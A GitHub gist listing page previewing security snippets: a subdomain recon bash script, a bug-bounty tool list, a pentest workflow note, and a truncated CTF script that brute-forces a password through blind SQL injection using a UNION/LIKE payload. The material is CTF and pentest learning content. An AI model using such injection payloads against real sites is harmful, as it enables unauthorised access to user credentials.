@zenosxx
zenosxx / subdomain.sh
Last active April 26, 2021 08:28
Subdomain recon
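#!/bin/bash
# Usage: subdomain.sh <domain>
echo "Recon $1"
domain="$1"
# Use $HOME here: a "~" inside quotes is not expanded by the shell
path="$HOME/Desktop/Asset-note"
folder="recon-$(date +"%Y-%m-%d")"
# Per-run subdomain output directory and the file-monitor directory for this domain
sub_path="$path/$domain/$folder/subdomain"
filemon_path="$path/$domain/Filemonitor"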
@intx0x80

Tools of The Bug Hunters Methodology V2

NOTE: The following list has been created based on the PPT "The Bug Hunters Methodology V2 by @jhaddix"

Discovery

  • Sublist3r (Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT).
  • Brutesubs (An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose).
  • Cloudflare_enum (Cloudflare DNS Enumeration Tool for Pentesters).
  • Censys.py (Quick and Dirty script to use the Censys API to query subdomains of a target domain).
  • massdns (A high-performance DNS stub resolver).
@jivoi
jivoi / offsec.md
Last active December 30, 2024 22:09
Penetration Testing/Assessment Workflow

Penetration Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole

@ZhangYiJiang
ZhangYiJiang / sql_injection.js
Created August 22, 2015 13:09
NUS Greyhats CTF Day 2 - Brute force password cracking on a blind SQL injection form
// Run this first: injects jQuery into the page
var s = document.createElement('script');
s.src = 'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js';
document.body.appendChild(s);
// SQL query: 1' AND FALSE UNION SELECT * FROM users WHERE password LIKE 'a%' #
// Recursive function to brute force out the password from the page
function getPassword(p) {
  $.post('http://web.nusgreyhats.org/blindsqli/register.php', {
    register: "1' AND FALSE UNION SELECT * FROM users WHERE password LIKE '" + p + "%' #"